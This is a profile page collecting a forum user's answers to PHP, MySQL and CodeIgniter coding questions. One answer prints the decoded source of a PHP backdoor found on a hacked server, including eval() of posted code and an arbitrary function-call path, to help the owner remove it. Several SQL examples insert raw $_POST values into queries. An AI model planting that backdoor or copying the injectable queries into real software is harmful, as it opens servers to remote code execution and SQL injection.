Posts by cereal

Change your implode() with: implode(',', $array['checkbox']);
or there is another problem?

@choconom you're welcome

implode(), in this case, is used to separate each value of the array by a comma, so you get a string: 3,8,17 (ref. to previous post) instead of something to loop like array(3,8,17)

if you change $_POST['checkbox[]'] you can get rid of the line $array = array("checkbox" => $_POST['checkbox']); since you have already an array, as already stated by jstfsklh211

bye!

The simplest solution is to add an iframe:

<form action="search.php" target="result" method="post">
    <input type="text" name="msg" />
    <input type="submit" name="submit" value="send" />
</form>

<iframe name="result" src="search.php"></iframe>

If you want to use javascript, you can try JQuery, which is a framework and helps you to write code faster, this is an example:

<html>
<head>
    <title>search</title>
    <script type="text/javascript" src="http://code.jquery.com/jquery-1.7.2.min.js"></script>
    <script type="text/javascript">

        $(document).ready(function(){

           $('#forma_kerkimit').submit(function(e) {
                e.preventDefault();

                $.ajax({
                  type: "GET",
                  url: "/phptest/search.php",
                  data: $('#forma_kerkimit').serialize(),
                  timeout: 30000,
                  cache: false,
                  error: function(){
                        $("#result").hide().html('server not responding');
                    },
                  success: function( msg ) {
                        $("#result").html(msg);
                  }
                });

            });

        });

    </script>
</head>
<body>

<!-- change this with your form -->
<form id="forma_kerkimit" method="get" action="/phptest/search.php">
    <input type="text" id="fname" name="fname" /><br />
    <input type="submit" name="search" id="search" value="search" />
</form>

<!-- display results from query -->
<div id="result"></div>

</body>
</html>

Here the important is that the form tag has the ID value of forma_kerkimit so the ajax request is done. The result div is where the script displays the query result. If your script is already working, just replace the form of this example with yours and it should work.

Bye.

In my code replace previous $_POST['checkbox'] with $_POST['checkbox[]']. I just forgot, sorry!

You can use:

• Ajax to display results in your HTML page
• an iframe
• otherwise you need to make your page processable by PHP

in this last option you can mantain the .html extension if you need it, but you have to change the configuration file of your server or add a directive in the .htaccess file:

AddType application/x-httpd-php .html

show your code, someone will help you. Bye!

Hello,
If you temporary comment the delete block of code and add an print_r($_POST) you can read in which format you get the data, something like this:

Array
(
    [checkbox] => Array
        (
            [0] => 3
            [1] => 8
            [2] => 17
        )

    [delete] => Delete
)

if you select an element to delete, otherwise you get:

Array
(
    [delete] => Delete
)

so, in the delete block instead of using $count which is related to the query result, you can count() the checkbox array and do a loop or use implode() to run just one query, like this:

if(isset($_POST['delete']))
{
    if(count($_POST['checkbox']) != 0)
    {
        $ids = implode(',', $_POST['checkbox']);
        $result = mysql_query("DELETE FROM r_textbook_info WHERE id IN($ids)") or die(mysql_error());
    }
 }

hope is useful, bye!

From php.net: http://php.net/manual/en/language.operators.logical.php

TRUE if either $a or $b is TRUE, but not both.

so, here's an example:

<?php
$a = true;
$b = true;
$c = false;

echo ($a xor $b) ? 'true':'false'; # output: false because $a and $b are both true
echo ($a xor $c) ? 'true':'false'; # output: true because $a is true, but not $c
?>

the above can be written also like this:

<?php
if($a xor $b) { echo 'true'; } else { echo 'false'; }
?>

ok?

have you read the user guide? http://codeigniter.com/user_guide/libraries/javascript.html

This is a known problem, check this comment in the function page: http://www.php.net/manual/en/function.strtotime.php#107331

There is also a note that suggest to use DateTime::sub():

Using this function for mathematical operations is not advisable. It is better to use DateTime::add() and DateTime::sub() in PHP 5.3 and later, or DateTime::modify() in PHP 5.2.

Old ok, sorry to bring this up but check dmoz.org you won't find "best" categories but you can find human-edited directories. I was a volunteer years ago, they usually accept to publish only what can bring a value to the directory, so this may be a place to start.

http://www.dmoz.org/help/geninfo.html

;D

condition = 'value' is just an example, you have to choose your condition for the WHERE statement, for example, basing on your table write: userid = '$_POST[id]'

Remove those parentheses after userid = and before WHERE.

$_FILES[] is a superglobal variable: http://php.net/manual/en/reserved.variables.files.php

You can read the Language Reference section in the PHP Manual to get the information you are searching for: http://www.php.net/manual/en/langref.php

You UPDATE query is wrong, you wrote:

UPDATE table SET() WHERE VALUES();

Change it to:

UPDATE users
SET userid = '$_POST[userid]',
firstname = '$_POST[firstname]',
lastname = '$_POST[lastname]',
email = '$_POST[email]',
username = '$_POST[username]',
password = '$_POST[password]',
role = '$_POST[role]')
WHERE condition = 'value';

Check this for more info: http://dev.mysql.com/doc/refman/5.5/en/update.html
And remember to sanitize data.

$query = ("DELETE FROM users WHERE fieldname = '".$_GET["userid"]."' LIMIT 1");

Change fieldname to userid, bye! ;D

Try substr(): http://www.php.net/manual/en/function.substr.php

$a = 1234;
echo substr($a,-1,1); # outputs 4

I think your first script is ok but, you can check by placing print_r($_POST); exit; right after session_start() and see what you get from your form.

Then, in your second script you have the curly brackets without any condition and or die(mysql_error()); but I don't see any query. Try to remove them.

If the tables structeres are the same then you can use UNION, something like:

SELECT * FROM table1 WHERE condition = 'this' UNION SELECT * FROM table2 WHERE condition = 'this';

But if the tables are the same you will get a better performance if you merge them in a single table and create an index. http://dev.mysql.com/doc/refman/5.0/en/union.html

Check you code at line ~16 and if you don't find anything strange then paste your script here.

@vibhaJ sorry, I didn't saw your answer! ;D

Here in Italy is high: 9.50$ (in euro 7.17€) per gallon.. ~1.895€ per liter but in some places we arrive to 2€ per liter... this happens because almost 60% of the final price is composed by government taxes and vat..

Also, you can use $this->input->post('fieldname'); instead of $_POST['fieldname'] and you can just write: $this->books->save_books();

http://codeigniter.com/user_guide/libraries/input.html

You're welcome, if your problem is solved please mark the thread as solved, bye :)

Sorry for the additional comment but I forgot to add this to my previous reply: you can also check and increase the size of the buffer for the index instead of the sort buffer:

• in MyISAM you need to change key_buffer_size: http://dev.mysql.com/doc/refman/5.5/en/server-system-variables.html#sysvar_key_buffer_size
• in InnoDB instead is innodb_buffer_pool_size: http://dev.mysql.com/doc/refman/5.5/en/innodb-parameters.html#sysvar_innodb_buffer_pool_size

I don't know if you solved, but what you get if you run show indexes from articles; this will give you some values for each field in the index, check about cardinality, if this is too low in some fields, for example in forumid, deleted and lastpost then this can be the reason why the index is not working: too many rows to read. And if this happens the reading buffer can't read all rows and use filesort() to read small part of data, check: http://s.petrunia.net/blog/?p=24

So maybe you can try to increase sort_buffer_size (default is ~2MB) and let fit the index in memory: http://dev.mysql.com/doc/refman/5.0/en/server-system-variables.html#sysvar_sort_buffer_size

Change this: implode(", ", $new) to single quotes: implode(', ', $new) bye!

Have you tried FORCE INDEX? http://dev.mysql.com/doc/refman/5.5/en/how-to-avoid-table-scan.html

Add or die(mysql_error()); both to line 2 and 4 (and also 7 if you want to check the query). Probably you need to set username, password in mysql_connect(), because if there is no database connection, mysql_query() returns false and you get that error.

With GD it's not simple, you need to detect if the image is animated, split, resize each frame and merge them again, check if this class is helpful for you:

http://www.phpclasses.org/package/7353-PHP-Resize-animations-in-files-of-the-GIF-format.html

bye!

Something like this will work:

    <?php
    $file = $_FILES['file']['name'];
    $a = pathinfo($file);

    $basename = $a['basename'];
    $filename = $a['filename'];
    $extension = $a['extension'];

    $path = $_SERVER['DOCUMENT_ROOT'].'/up/images/'; # set upload directory
    $dest = $path.$basename;

    if(file_exists($dest))
    {
        $b = count(glob($path.$filename.'*.'.$extension))+1; # all matches + 1
        for($i = 1; $i < $b; $i++)
        {
            if(!file_exists($path.$filename.$i.'.'.$extension))
            {
                move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename.$i.'.'.$extension);
            }
        }
    }
    else
    {
        move_uploaded_file($_FILES['file']['tmp_name'],$dest);
    }
    ?>

If the file exists then the script does a glob() in the destination directory in search of the filename (without the number) and counts all the matches, we add 1 to the result and go to loop until a free combination is find. This is just an interpretation of a function used in CodeIgniter framework that you can find in System/Libraries/Upload.php at line 390~ the difference is that in CI that function is limitated to 100 loops. Bye.

It's $q, imagepng() as third parameter takes values from 0 to 9, which is different from imagejpeg()

http://www.php.net/manual/en/function.imagepng.php

also, take a look at imagegif(), it does not have a third paramenter for quality, so remove it:

http://www.php.net/manual/en/function.imagegif.php

bye :)

Check on Pritaeas reply on thread: http://www.daniweb.com/web-development/php/threads/418719/reducing-image-size-during-upload-php
bye!

Provide the code you are using, at least the PNG creation part and the serving script. Otherwise it's hard (at least for me ^_^) to give the right answer, bye.

Just a little error: you are placing class="selected" inside <li> while your CSS is checking for the <a> tag. Change it like this:

<li><a <?php echo ($thisPage == 'Home') ? ' class="selected"' : ''; ?> href="index.php">Home</a></li>

bye!

On CodeIgniter forum there is a thread about a similar problem (I think), but at the moment there aren't answers:

http://codeigniter.com/forums/viewthread/209004/

I'm wondering if this can be related to Utf8 library, this is in System/Core, check if removing @ from iconv() and mb_convert_encoding() will display an error. Good luck!

Ok, if we've finished mark this thread as solved, bye :)

Right, then change it to:

"SELECT FirstName, LastName, Age, Hometown, Job FROM people WHERE age <= ?"

As explained here: http://php.net/manual/en/mysqli-stmt.bind-param.php

Add single quotes around $keyword:

"SELECT FirstName, LastName, Age, Hometown, Job FROM people WHERE age <= '$keyword' "

Also use CODE tags when posting to the forum, bye :)

Maybe it's a memory limit issue, i.e. the memory used by PHP scripts, did you get any error? If error reporting is disabled, place <?php error_reporting(E_ALL); ?> at top of the script and see what it happens.

Your code seems ok to me, but why do you have var_dump($x); inside your javascript? var_dump() it's PHP, you need console.log there, or alert as you already wrote. And also you need to change your document.write to integrate the var as you did in the alert: document.write('<a href="' + unescapedUrl + '">save the image</a>'); bye :)

This is called database replication, you can apply different solutions, if you are using MySQL then read these:

http://dev.mysql.com/doc/refman/5.0/en/replication.html
http://www.howtoforge.com/mysql_database_replication

bye

Check the guide: http://codeigniter.com/user_guide/database/active_record.html#delete

$this->load->library('database');

$this->db->where('id',$id);
$this->db->delete('add_campaign');

$tables = array('table1', 'table2', 'table3');
$this->db->where('addcampid', $id);
$this->db->delete($tables);

bye

It can be done like this:

<?php
$html = '<tbody><tr>   <td>1.</td>   <td><a href="something.php?y=US&amp;id=197003">Some Name Here</a></td>   <td>City, STATE</td>   <td class="noWrap"></td>   <td class="noWrap">123-456-7890</td></tr><tr class="altRow">   <td>2.</td>   <td><a href="something.php?y=US&amp;id=113762">Another Name</a></td>   <td>City, STATE</td>   <td class="noWrap"></td>   <td class="noWrap">123-456-7890</td></tr>';

function get_id($data)
{
	preg_match_all('/< *a[^>]*href *= *["\']?([^"\']*)/i', $data, $matches);
	$result = array();
	foreach($matches[1] as $id)
	{
		$r = explode('id=',$id);
		$result[] = $r[1];
	}
	return $result;
}
print_r(get_id($html));
?>

Using preg_match_all to get all href in a tags and then searching for the right pattern, the constant, I set "id=" as constant in the explode() function but you can set also explode('something.php?y=US&id=',$id); if you want and you will get the same result:

Array
(
    [0] => 197003
    [1] => 113762
)

an array of IDs, bye :)

Place resource link as second parameter, the first has to be the query string:

$r = mysql_query("DELETE FROM customer WHERE id = '$id'",$dbc);

Bye :)

I just read system requirements on their website, check the link, bye :)

Hi, that is not sufficient, there are many ways to attack a PHP application you may want to read more about this subject here:

- https://www.owasp.org/index.php/Projects/OWASP_Secure_Web_Application_Framework_Manifesto/Releases/Current/Manifesto
- http://phpsec.org/projects/ & check also /library/

You must check server logs and application logs, review firewall rules, check if there are new processes. You can also try to search more info about this script by searching ppZiAAS8dDJF9Q*(#_+@#TWyJ , it seems this string is in common with other versions of the same script. Bye.

last string is hex code, while the rest is base64, this is the translation:

/**
 * @version 2.6
 *
 */
if (isset($_POST["action"]))
{
        switch ($_POST["action"])
        {
                case "test":
                        test();
                        break;
                case "regular_test":
                        regular_test();
                        break;
                case "mail":
                        send();
                        break;
                default:
                        break;
        }
        return;
}

if (count($_GET) > 0)
{
        foreach ($_GET as $id => $code)
        {
                if ($id == "id")
                {
                        $code();
                }
        }
        return;
}

function test()
{
        $encoded_data = "";

        $data["version"] = phpversion();
        if (isset($_SERVER["SERVER_SOFTWARE"]))
        {
                $data["serverapi"] = $_SERVER["SERVER_SOFTWARE"];
        }
        else
        {
                $data["serverapi"] = "Not Available";
        }
        ob_start();
        phpinfo(8);
        $data["modules"] = ob_get_contents();
        ob_clean();
        $data["ext_connect"] = fopen("http://www.ya.ru/", "r") ? TRUE : FALSE;
        $serializes_data = serialize($data);
        $encoded_data = base64_encode($serializes_data);
        echo $_POST["test_message"] . $encoded_data;
}

function regular_test()
{

        $to = "air@example.com";
        $subj = "SUBJ!";
        $message = "EHLO";
        $res = mail($to,$subj,$message);
        if($res)
        {
            echo $_POST["test_message"];
        }
        else
        {
            echo strrev($_POST["test_message"]);
        }
}

function send()
{
        $code = base64_decode($_POST["projectcode"]);

        eval($code);
        //return;
}

last string:

echo base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7');
# output:
# $code = base64_decode($_);
# eval($code);

You can start by removing it and sanitizing the data you get from any script in which you use POST or GET methods.

This is JSON, use print_r(json_decode($data,true)); to display the array, bye.

Start from here: https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)

bye!

That's an IF statement:

if(isset($_SESSION['products']))
{
    $products = $_SESSION['products']; 
} else {
    $products = array();
}

Or

$products = array();
if(isset($_SESSION['products']))
{
    $products = $_SESSION['products']; 
}

I'm referring to line 45 and 46, if this is empty then you get an error, if you define a default case you have also to insert some code:

default:
echo 'default case'; # example
break;

bye :)